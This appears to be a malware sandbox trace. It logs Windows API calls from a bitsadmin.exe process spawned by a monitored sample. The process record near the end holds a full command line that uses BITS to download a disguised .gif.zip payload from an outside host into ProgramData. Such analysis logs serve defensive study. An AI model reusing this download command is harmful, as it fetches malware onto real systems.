[0069.663] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef43c | out: lpConsoleScreenBufferInfo=0xef43c) returned 1
[0069.663] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xef454, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef454*=0x8) returned 1
[0069.663] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.664] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xef460 | out: _Buffer="0") returned 1
[0069.664] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xef46c | out: _Buffer="1") returned 1
[0069.664] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef43c | out: lpConsoleScreenBufferInfo=0xef43c) returned 1
[0069.664] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xef454, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef454*=0x5) returned 1
[0069.664] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.664] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef444 | out: lpConsoleScreenBufferInfo=0xef444) returned 1
[0069.664] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xef45c, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef45c*=0x8) returned 1
[0069.665] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.665] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xef468 | out: _Buffer="0") returned 1
[0069.665] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xef454 | out: lpSystemTimeAsFileTime=0xef454*(dwLowDateTime=0xda231e50, dwHighDateTime=0x1d469c7))
[0069.665] _finite (_X=0x0) returned 1
[0069.665] _finite (_X=0x0) returned 1
[0069.665] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef414 | out: lpConsoleScreenBufferInfo=0xef414) returned 1
[0069.665] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0xef42c, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef42c*=0xd) returned 1
[0069.665] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.665] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef420 | out: lpConsoleScreenBufferInfo=0xef420) returned 1
[0069.666] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0xef438, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef438*=0xf) returned 1
[0069.666] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.666] _vsnwprintf (in: _Buffer=0xef24c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0xef210 | out: _Buffer="0.00 B/S") returned 8
[0069.666] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef464 | out: lpConsoleScreenBufferInfo=0xef464) returned 1
[0069.666] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xef47c, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef47c*=0x8) returned 1
[0069.666] CoTaskMemFree (pv=0x198370)
[0069.667] PeekMessageW (in: lpMsg=0xefdd8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xefdd8) returned 0
[0069.667] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0xefe00*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0069.819] PeekMessageW (in: lpMsg=0xefdd8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xefdd8) returned 1
[0069.819] TranslateMessage (lpMsg=0xefdd8) returned 0
[0069.819] DispatchMessageW (lpMsg=0xefdd8) returned 0x1
[0069.819] IBackgroundCopyCallback:JobModification (This=0x1a0c88, pJob=0x18a6a4, dwReserved=0x0) returned 0x0
[0069.819] IBackgroundCopyJob:GetState (in: This=0x18a614, pVal=0x1a0c94 | out: pVal=0x1a0c94) returned 0x0
[0069.836] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fc1
[0069.836] IBackgroundCopyJob:GetType (in: This=0x18a614, pVal=0xef4a0 | out: pVal=0xef4a0) returned 0x0
[0069.836] IBackgroundCopyCallback:JobModification (This=0x1a0c88, pJob=0x18a6a4, dwReserved=0x0) returned 0x0
[0069.836] IBackgroundCopyJob:GetState (in: This=0x18a614, pVal=0x1a0c94 | out: pVal=0x1a0c94) returned 0x0
[0069.837] IBackgroundCopyJob:GetProgress (in: This=0x18a614, pVal=0x1a0c98 | out: pVal=0x1a0c98) returned 0x0
[0069.838] IBackgroundCopyJob:GetPriority (in: This=0x18a614, pVal=0xef49c | out: pVal=0xef49c) returned 0x0
[0069.839] CoTaskMemFree (pv=0x0)
[0069.839] IBackgroundCopyJob:GetDisplayName (in: This=0x18a614, pVal=0xef4b4 | out: pVal=0xef4b4*="msd5") returned 0x0
[0069.840] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef45c | out: lpConsoleScreenBufferInfo=0xef45c) returned 1
[0069.840] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0xef474 | out: lpNumberOfCharsWritten=0xef474) returned 1
[0069.840] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0xef474 | out: lpNumberOfAttrsWritten=0xef474) returned 1
[0069.840] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0069.840] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.841] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef448 | out: lpConsoleScreenBufferInfo=0xef448) returned 1
[0069.841] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0xef460, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef460*=0xa) returned 1
[0069.841] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.841] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef444 | out: lpConsoleScreenBufferInfo=0xef444) returned 1
[0069.841] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xef45c, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef45c*=0x5) returned 1
[0069.842] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.842] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef44c | out: lpConsoleScreenBufferInfo=0xef44c) returned 1
[0069.842] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xef464, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef464*=0x7) returned 1
[0069.842] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.842] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef440 | out: lpConsoleScreenBufferInfo=0xef440) returned 1
[0069.843] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xef458, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef458*=0x8) returned 1
[0069.843] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.843] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef448 | out: lpConsoleScreenBufferInfo=0xef448) returned 1
[0069.843] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xef460, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef460*=0x8) returned 1
[0069.843] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.844] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef43c | out: lpConsoleScreenBufferInfo=0xef43c) returned 1
[0069.844] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xef454, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef454*=0xc) returned 1
[0069.844] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.844] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef44c | out: lpConsoleScreenBufferInfo=0xef44c) returned 1
[0069.844] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0xef464, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef464*=0xa) returned 1
[0069.845] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.845] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef434 | out: lpConsoleScreenBufferInfo=0xef434) returned 1
[0069.845] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0xef44c, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef44c*=0xa) returned 1
[0069.845] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.845] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef43c | out: lpConsoleScreenBufferInfo=0xef43c) returned 1
[0069.846] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xef454, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef454*=0x8) returned 1
[0069.846] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.846] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xef460 | out: _Buffer="0") returned 1
[0069.846] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xef46c | out: _Buffer="1") returned 1
[0069.846] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef43c | out: lpConsoleScreenBufferInfo=0xef43c) returned 1
[0069.846] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xef454, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef454*=0x5) returned 1
[0069.846] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.847] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef444 | out: lpConsoleScreenBufferInfo=0xef444) returned 1
[0069.847] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xef45c, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef45c*=0x8) returned 1
[0069.847] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.847] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xef468 | out: _Buffer="0") returned 1
[0069.847] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xef46c | out: _Buffer="243712") returned 6
[0069.847] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xef468 | out: _Buffer="0") returned 1
[0069.847] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xef454 | out: lpSystemTimeAsFileTime=0xef454*(dwLowDateTime=0xda3d4d70, dwHighDateTime=0x1d469c7))
[0069.847] _finite (_X=0x0) returned 1
[0069.847] _finite (_X=0x0) returned 1
[0069.847] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef414 | out: lpConsoleScreenBufferInfo=0xef414) returned 1
[0069.847] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0xef42c, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef42c*=0x11) returned 1
[0069.848] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.848] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef420 | out: lpConsoleScreenBufferInfo=0xef420) returned 1
[0069.848] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0xef438, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef438*=0xf) returned 1
[0069.848] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.848] _vsnwprintf (in: _Buffer=0xef24c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0xef210 | out: _Buffer="0.00 B/S") returned 8
[0069.848] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xef464 | out: lpConsoleScreenBufferInfo=0xef464) returned 1
[0069.849] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xef47c, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xef47c*=0x8) returned 1
[0069.849] CoTaskMemFree (pv=0x198398)
[0069.849] PeekMessageW (in: lpMsg=0xefdd8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xefdd8) returned 0
[0069.849] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0xefe00*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0070.244] PeekMessageW (in: lpMsg=0xefdd8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xefdd8) returned 1
[0070.244] TranslateMessage (lpMsg=0xefdd8) returned 0
[0070.244] DispatchMessageW (lpMsg=0xefdd8) returned 0x1
[0070.244] IBackgroundCopyCallback:JobModification (This=0x1a0c88, pJob=0x18a6a4, dwReserved=0x0) returned 0x0
[0070.244] IBackgroundCopyJob:GetState (in: This=0x18a614, pVal=0x1a0c94 | out: pVal=0x1a0c94) returned 0x0
[0070.245] IBackgroundCopyCallback:JobTransferred (This=0x1a0c88, pJob=0x18a6a4) returned 0x0
[0070.245] KillTimer (hWnd=0x0, uIDEvent=0x7fc1) returned 1
[0070.245] IBackgroundCopyJob:GetState (in: This=0x18a614, pVal=0x1a0c94 | out: pVal=0x1a0c94) returned 0x0
[0070.246] IBackgroundCopyJob:GetType (in: This=0x18a614, pVal=0xee40c | out: pVal=0xee40c) returned 0x0
[0070.247] IBackgroundCopyJob:GetProgress (in: This=0x18a614, pVal=0x1a0c98 | out: pVal=0x1a0c98) returned 0x0
[0070.247] IBackgroundCopyJob:GetPriority (in: This=0x18a614, pVal=0xee408 | out: pVal=0xee408) returned 0x0
[0070.248] CoTaskMemFree (pv=0x0)
[0070.248] IBackgroundCopyJob:GetDisplayName (in: This=0x18a614, pVal=0xee420 | out: pVal=0xee420*="msd5") returned 0x0
[0070.248] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3c8 | out: lpConsoleScreenBufferInfo=0xee3c8) returned 1
[0070.249] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0xee3e0 | out: lpNumberOfCharsWritten=0xee3e0) returned 1
[0070.249] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0xee3e0 | out: lpNumberOfAttrsWritten=0xee3e0) returned 1
[0070.249] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0070.249] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.249] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3b4 | out: lpConsoleScreenBufferInfo=0xee3b4) returned 1
[0070.250] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0xee3cc, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3cc*=0xa) returned 1
[0070.250] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.250] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3b0 | out: lpConsoleScreenBufferInfo=0xee3b0) returned 1
[0070.250] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xee3c8, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3c8*=0x5) returned 1
[0070.250] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.250] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3b8 | out: lpConsoleScreenBufferInfo=0xee3b8) returned 1
[0070.251] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xee3d0, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3d0*=0x7) returned 1
[0070.251] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.251] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3ac | out: lpConsoleScreenBufferInfo=0xee3ac) returned 1
[0070.251] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xee3c4, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3c4*=0x8) returned 1
[0070.251] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.251] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3b4 | out: lpConsoleScreenBufferInfo=0xee3b4) returned 1
[0070.252] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xee3cc, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3cc*=0x8) returned 1
[0070.252] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.252] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3a8 | out: lpConsoleScreenBufferInfo=0xee3a8) returned 1
[0070.252] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0xee3c0, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3c0*=0xd) returned 1
[0070.252] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.252] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3b8 | out: lpConsoleScreenBufferInfo=0xee3b8) returned 1
[0070.253] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0xee3d0, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3d0*=0xa) returned 1
[0070.253] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.253] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3a0 | out: lpConsoleScreenBufferInfo=0xee3a0) returned 1
[0070.253] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0xee3b8, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3b8*=0xa) returned 1
[0070.253] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.253] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3a8 | out: lpConsoleScreenBufferInfo=0xee3a8) returned 1
[0070.254] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xee3c0, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3c0*=0x8) returned 1
[0070.254] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.254] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xee3cc | out: _Buffer="1") returned 1
[0070.254] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xee3d8 | out: _Buffer="1") returned 1
[0070.254] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3a8 | out: lpConsoleScreenBufferInfo=0xee3a8) returned 1
[0070.254] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xee3c0, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3c0*=0x5) returned 1
[0070.254] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0070.255] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3b0 | out: lpConsoleScreenBufferInfo=0xee3b0) returned 1
[0070.255] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xee3c8, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3c8*=0x8) returned 1
[0070.255] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.255] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xee3d4 | out: _Buffer="243712") returned 6
[0070.255] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xee3d8 | out: _Buffer="243712") returned 6
[0070.255] _vsnwprintf (in: _Buffer=0xa803f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0xee3d4 | out: _Buffer="100") returned 3
[0070.255] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3d0 | out: lpConsoleScreenBufferInfo=0xee3d0) returned 1
[0070.255] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0xee3e8, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3e8*=0x16) returned 1
[0070.256] CoTaskMemFree (pv=0x198398)
[0070.256] IBackgroundCopyJob:Complete (This=0x18a614) returned 0x0
[0070.262] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3d4 | out: lpConsoleScreenBufferInfo=0xee3d4) returned 1
[0070.262] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3a8 | out: lpConsoleScreenBufferInfo=0xee3a8) returned 1
[0070.262] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xee3c0, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3c0*=0x2) returned 1
[0070.262] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xee3a8 | out: lpConsoleScreenBufferInfo=0xee3a8) returned 1
[0070.262] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa743c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xee3c0, lpReserved=0x0 | out: lpBuffer=0xa743c4*, lpNumberOfCharsWritten=0xee3c0*=0x14) returned 1
[0070.263] GetCurrentThreadId () returned 0xc6c
[0070.263] PostThreadMessageW (idThread=0xc6c, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0070.263] PeekMessageW (in: lpMsg=0xefdd8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xefdd8) returned 1
[0070.263] IUnknown:Release (This=0x18a614) returned 0x1
[0070.263] IUnknown:Release (This=0x18a53c) returned 0x0
[0070.263] CoUninitialize ()
[0070.264] IUnknown:Release (This=0x1a0c88) returned 0x2
[0070.264] IUnknown:Release (This=0x1a0c88) returned 0x1
[0070.264] IUnknown:Release (This=0x1a0c88) returned 0x0
[0070.264] IUnknown:Release (This=0x18a614) returned 0x1
[0070.264] CoTaskMemFree (pv=0x1a0c88)
[0070.283] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0070.283] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0070.283] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0070.283] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0070.283] CloseHandle (hObject=0x80) returned 1
[0070.284] exit (_Code=0)
Thread:
id = 148
os_tid = 0xc80
Thread:
id = 149
os_tid = 0xc84
Thread:
id = 150
os_tid = 0xc88
Thread:
id = 151
os_tid = 0xc8c
Process:
id = "14"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be3a0"
os_pid = "0xc98"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmg.gif.zip?491458574 C:\\ProgramData\\tempa\\marxvxinhhmg.gif"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1561
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1562
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
